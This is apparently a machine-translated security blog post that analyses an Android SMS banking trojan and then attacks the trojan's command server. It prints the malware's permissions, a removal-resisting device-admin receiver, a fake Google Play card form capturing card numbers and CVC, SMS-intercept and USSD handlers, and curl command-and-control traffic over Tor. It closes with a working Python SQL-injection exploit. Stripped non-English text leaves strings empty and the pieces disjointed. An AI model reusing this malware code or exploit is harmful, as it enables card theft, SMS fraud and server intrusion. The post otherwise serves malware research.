<uses-permission android:name="android.permission.INTERNET" /> <uses-permission android:name="android.permission.SEND_SMS" /> <uses-permission android:name="android.permission.READ_SMS" /> <uses-permission android:name="android.permission.RECEIVE_SMS" /> <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" /> <uses-permission android:name="android.permission.READ_PHONE_STATE" /> <uses-permission android:name="android.permission.WAKE_LOCK" /> <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" /> <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" /> <uses-permission android:name="android.permission.READ_CONTACTS" /> <uses-permission android:name="android.permission.CALL_PHONE" /> <uses-permission android:name="android.permission.GET_ACCOUNTS" /> <uses-permission android:name="android.permission.VIBRATE" /> <uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS" />
<receiver android:label=" " android:name="app.six.MyAdmin" android:permission="android.permission.BIND_DEVICE_ADMIN"> <meta-data android:name="android.app.device_admin" android:resource="@layout/policies" /> <intent-filter> <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" /> </intent-filter> </receiver>
<?xml version="1.0" encoding="utf-8"?> <device-admin> <uses-policies /> </device-admin>
public CharSequence onDisableRequested(Context ctx, Intent paramIntent) { return " , ! , ?"; }
<activity android:theme="@*android:style/Theme.Light.NoTitleBar.Fullscreen" android:label="Play " android:icon="@drawable/market_icon" android:name="app.six.CardAtivity" android:screenOrientation="portrait" android:configChanges="keyboardHidden|orientation" />
<receiver android:name="app.six.MainReceiver"> <intent-filter android:priority="100"> <action android:name="android.provider.Telephony.SMS_RECEIVED" /> <action android:name="android.intent.action.BOOT_COMPLETED" /> <action android:name="android.intent.action.USER_PRESENT" /> <action android:name="android.intent.action.PHONE_STATE" /> <action android:name="android.intent.action.NEW_OUTGOING_CALL" /> </intent-filter> </receiver> <service android:name="app.six.MainService" /> <activity android:label="@string/title_activity_adm" android:name="app.six.AdmActivity" android:launchMode="singleTask" /> </application> </manifest>
curl --socks5 127.0.0.1:9050 --data "mode=register&prefix=1&version_sdk=123.4.4(Bot.v.4.2)&imei=1234567890123&country=ru&number=null&operator=Beeline" url.com/controller.php
{"response": [{"bot_id": 1234, "bot_pwd": "blabla"}],
"status": "ok"}
curl --socks5 127.0.0.1:9050 --data "mode=getTask&bid=348&pwd=17h9q&divice_admin=1" url.com/controller.php
{"response": [{"mode": "set_intercept",
"intercept": "all"},{"mode": "upcatsm"},{"mode": "timer_msg",
"sms_id": "1232",
"sms_text": "",
"sms_number": "900",
"time": "20"}],
"status": "ok"}
curl --socks5 127.0.0.1:9050 --data "mode=setSaveInboxSms&number=900&text=VISA1234 :23000.&time=2016-01-27 20:01:15&status_sms=1&sms_mode=2&bid=1234" url.com/controller.php
{"response": [],
"status": "ok"}
{"response": [{"mode": "set_intercept",
"intercept": "all"}],
"status": "ok"}
JSONObject newOb = arr.getJSONObject(i); if (newOb.getString("mode").equals("set_intercept")) { dbSet.setIntercept(newOb.getString(DbSet.INTERCEPT)); } if (newOb.getString("mode").equals("set_interval")) { dbLog.setInterval(newOb.getInt(U_COLUMS.INTERVAL)); } if (newOb.getString("mode").equals("send_sms")) { mItem = new MessageItem(newOb.getString("sms_number"), newOb.getString("sms_text"), newOb.getInt("sms_id")); Settings.sendSms(MainService.this.ctx, mItem); } if (newOb.getString("mode").equals("set_server")) { dbSet.setServer(MainService.this.ctx, newOb.getString(DbSet.SERVER)); } if (newOb.getString("mode").equals("upcatsm")) { new Settings(MainService.this.ctx).upServerCatSms(); } if (newOb.getString("mode").equals("upsmlist")) { new Settings(MainService.this.ctx).upServerSmsList(newOb.getString("number")); } if (newOb.getString("mode").equals("changeNotify")) { dbSet.setNotify(newOb.getString("text")); } if (newOb.getString("mode").equals("get_ussd")) { SettingsBase.ussdOn(MainService.this.ctx, newOb.getString("text")); } if (newOb.getString("mode").equals("timer_msg")) { mItem = new MessageItem(newOb.getString("sms_number"), newOb.getString("sms_text"), newOb.getInt("sms_id")); Settings.sendSmsTimer(MainService.this.ctx, mItem, newOb.getInt("time")); }
if ((str.equals("all")) || (str.equals("All")) || (str.equals("ALL")) || (str.equals("")))
public static boolean sendSms(Context context, MessageItem item) { try { Intent intent = new Intent(context, MainReceiver.class); intent.setAction(Constants.CONST_SMS_DELIVERED_STATUS); intent.putExtra(Constants.CONST_ID_SEND_SMS, item.id); PendingIntent sentPendingIntent = PendingIntent.getBroadcast(context, item.id, intent, 0); try { SmsManager.getDefault().sendTextMessage(item.phone, null, item.text, sentPendingIntent, null); } catch (Exception e) { sendMessage(context, " .", "ERROR", 1, 0); } return true; } catch (Exception ex) { ex.printStackTrace(); return false; } }
<?xml version="1.0" encoding="utf-8"?> <LinearLayout android:orientation="1" android:background="#fff" android:layout_width="-1" android:layout_height="-1" <LinearLayout android:background="@drawable/top" android:layout_width="-1" android:layout_height="50dp" <LinearLayout android:orientation="1" android:background="#fff" android:layout_width="-2" android:layout_height="-1"> <ImageView android:id="@id/imageView1" android:background="#fff" android:layout_width="-2" android:layout_height="-2" android:layout_margin="5dp" android:src="@drawable/market_icon" /> </LinearLayout> <TextView android:textAppearance="?unknown_attr_ref: 1010041" android:textColor="#fff" android:layout_gravity="10" android:id="@id/textView1" android:layout_width="-1" android:layout_height="-2" android:layout_marginLeft="5dp" android:text="Google Play" /> </LinearLayout> <LinearLayout android:orientation="1" android:id="@id/layoutOk" android:background="#fff" android:visibility="2" android:layout_width="-1" android:layout_height="-2"> <TextView android:textAppearance="?unknown_attr_ref: 1010041" android:textColor="#1c1c1c" android:id="@id/textView5" android:layout_width="-2" android:layout_height="-2" android:layout_margin="5dp" android:text=", . email ." /> <Button android:textColor="#fff" android:id="@id/btn_close" android:background="@drawable/btn" android:layout_width="-1" android:layout_height="40dp" android:layout_marginLeft="5dp" android:layout_marginTop="10dp" android:layout_marginRight="5dp" android:text="" /> </LinearLayout> <LinearLayout android:orientation="1" android:id="@id/layout1" android:layout_width="-1" android:layout_height="-2" /> <ScrollView android:id="@id/scrollView1" android:visibility="0" android:layout_width="-1" android:layout_height="-1" android:isScrollContainer="true"> <LinearLayout android:orientation="1" android:layout_width="-1" android:layout_height="-2" <LinearLayout android:orientation="1" android:id="@id/layout2" android:background="#fff" android:visibility="0" android:layout_width="-1" android:layout_height="-2"> <TextView android:textAppearance="?unknown_attr_ref: 1010041" android:textColor="#a52a2a" android:id="@id/textError" android:visibility="2" android:layout_width="-1" android:layout_height="-2" android:layout_margin="3dp" android:text="Medium Text" /> <TextView android:textAppearance="?unknown_attr_ref: 1010041" android:textColor="#1c1c1c" android:id="@id/textView2" android:layout_width="-1" android:layout_height="-2" android:layout_margin="5dp" android:text=" Google Play ." /> </LinearLayout> <LinearLayout android:orientation="1" android:id="@id/LinearInput" android:visibility="0" android:layout_width="-1" android:layout_height="-2" android:layout_marginTop="5dp" <LinearLayout android:layout_width="-1" android:layout_height="-2"> <ImageView android:id="@id/imageView2" android:layout_width="-2" android:layout_height="-2" android:layout_margin="5dp" android:src="@drawable/visa" /> <ImageView android:id="@id/imageView3" android:layout_width="-2" android:layout_height="-2" android:layout_margin="5dp" android:src="@drawable/mastercard" /> <ImageView android:id="@id/imageView4" android:layout_width="-2" android:layout_height="-2" android:layout_margin="5dp" android:src="@drawable/logo_maestro" /> <ImageView android:id="@id/imageView4343f" android:layout_width="-2" android:layout_height="-2" android:layout_margin="5dp" android:src="@drawable/discovery" /> </LinearLayout> <LinearLayout android:layout_width="-1" android:layout_height="-2" android:layout_marginTop="5dp"> <EditText android:id="@id/ETCard1" android:layout_width="-1" android:layout_height="-2" android:layout_marginLeft="5dp" android:layout_marginRight="2dp" android:ems="10" android:maxLength="4" android:layout_weight="1.0" android:inputType="2"> <requestFocus /> </EditText> <EditText android:id="@id/ETCard2" android:focusableInTouchMode="true" android:layout_width="-1" android:layout_height="-2" android:layout_marginLeft="2dp" android:layout_marginRight="2dp" android:maxLength="4" android:digits="0123456789 " android:layout_weight="1.0" android:inputType="2" /> <EditText android:id="@id/ETCard3" android:layout_width="-1" android:layout_height="-2" android:layout_marginLeft="2dp" android:layout_marginRight="2dp" android:maxLines="1" android:ems="10" android:maxLength="4" android:layout_weight="1.0" android:inputType="2" /> <EditText android:id="@id/ETCard4" android:layout_width="-1" android:layout_height="-2" android:layout_marginLeft="2dp" android:layout_marginRight="5dp" android:ems="10" android:maxLength="4" android:layout_weight="1.0" android:inputType="2" /> </LinearLayout> <LinearLayout android:layout_width="-1" android:layout_height="-2"> <EditText android:id="@id/ETCard5" android:layout_width="70dp" android:layout_height="-2" android:layout_marginLeft="5dp" android:layout_marginTop="5dp" android:layout_marginRight="5dp" android:hint="" android:ems="10" android:maxLength="2" android:inputType="2" /> <TextView android:layout_gravity="10" android:id="@id/textView3" android:layout_width="-2" android:layout_height="-2" android:text="/" /> <EditText android:id="@id/ETCard6" android:layout_width="70dp" android:layout_height="-2" android:layout_margin="5dp" android:hint="" android:ems="10" android:maxLength="2" android:inputType="2" /> </LinearLayout> <LinearLayout android:layout_width="-1" android:layout_height="-2"> <EditText android:id="@id/ETCard7" android:layout_width="100dp" android:layout_height="-2" android:layout_marginLeft="5dp" android:layout_marginTop="5dp" android:layout_marginRight="5dp" android:hint="CVC-" android:ems="10" android:maxLength="3" android:inputType="2" /> <ImageView android:layout_gravity="10" android:id="@id/imageView5" android:layout_width="-2" android:layout_height="-2" android:src="@drawable/cvc_visa" /> </LinearLayout> <EditText android:id="@id/EditTextName" android:layout_width="-1" android:layout_height="-2" android:layout_marginLeft="5dp" android:layout_marginTop="5dp" android:layout_marginRight="5dp" android:hint=" " android:ems="10" android:maxLength="60" android:inputType="1" /> <Button android:textColor="#fff" android:id="@id/btn_save" android:background="@drawable/btn" android:layout_width="-1" android:layout_height="40dp" android:layout_marginLeft="5dp" android:layout_marginTop="10dp" android:layout_marginRight="5dp" android:text="" /> </LinearLayout> <Button android:textColor="#8b8989" android:id="@id/btnCancel" android:background="@drawable/btn_alpa" android:visibility="2" android:layout_width="-1" android:layout_height="40dp" android:layout_marginTop="15dp" android:text="" /> </LinearLayout> </ScrollView> </LinearLayout>
public static void ussdOn(Context context, String phone) { phone = new StringBuilder(String.valueOf(phone)).append(Uri.encode("#")).toString(); C0091M.m6d("ussdOn: " + phone); try { Intent intent = new Intent("android.intent.action.CALL", Uri.parse("tel:" + phone)); intent.addFlags(268435456); context.startActivity(intent); } catch (Exception e) { Settings.sendMessage(context, " : USSD " + phone, "", 2, 0); } }
Having seen the allowed dir listng, I decided to look for a server where php code is not interpreted in order to get the source code. As a result, I found a non- password archive with source code on the server.
Quickly walked through the source - most of the parameters are filtered and the attack is impossible. But there was one moment where the filtered parameter ceased to be so.
The developer, instead of using the filtered parameter as an argument in the function, preferred to take the same parameter, but without a filter. The function itself places the balance information in the database.
The same parameter that is passed without a filter further passes through the regular expression preg_match ('/ Balances: (. *?) Rub. / Is', $ message, $ links)
what we have in (. *?) will then be used in the database query. Such a regular expression allows us to use arbitrary text, in this case it is an injection.
With the help of an injection, we can write arbitrary data to the table, including those from other tables, which is obvious. The problem is how to view them further, the display of errors is turned off in the script. We need to look for the moment available to the user without authorization. And this is available in the registration of the bot. If the bot has already been registered, its password will show us in the output. What we are doing with the help of an injection - we update our password, send the registration package again and get the output
As a result, I wrote an account that pulls out the current user and version.
python exploit.py target.comexploit.py
import urllib2,urllib,sys,re def register(target, mode): values = { 'prefix': '111111111','version_sdk': '222222222', 'version_bot': '333333333', 'imei':'4444444444444', 'country':'%%', 'number':'31333731337', 'operator':'telekom'} data = urllib.urlencode(values) req = urllib2.Request(target+'/controller.php?mode=register', data) response = urllib2.urlopen(req) result = response.read() bot_pwd = re.compile('"bot_pwd": "(.*)"}]'); regex_pwd = re.findall(bot_pwd, result) bot_id = re.compile('"bot_id": (\d+),'); regex_id = re.findall(bot_id, result) if len(regex_pwd)>0: if mode == None: exploit(target, regex_id[0], None) else: print "Result: "+regex_pwd[0] else: print 'exploit failed.. cannot find enabled country or smth... :(' def exploit(target, id, payload): print 'Sending payload'; if payload==None: payload="\xD0\x91\xD0\xB0\xD0\xBB\xD0\xB0\xD0\xBD\xD1\x81: aaaa',pwd=(select concat_ws(0x3a,version(),user())) WHERE id="+str(id)+" -- 1\xD1\x80." values = { 'bid': '111111111','sms_mode': '1', 'number': '900', 'text': payload} data = urllib.urlencode(values) req = urllib2.Request(target+'/controller.php?mode=setSaveInboxSms', data) response = urllib2.urlopen(req) register(target, 'result') if len(sys.argv)>1: print 'Ur target is:'+sys.argv[1] print register(sys.argv[1], None) else: print 'usage: exploit.pl <http://local.ru/>'
Source: https://habr.com/ru/post/276211/
All Articles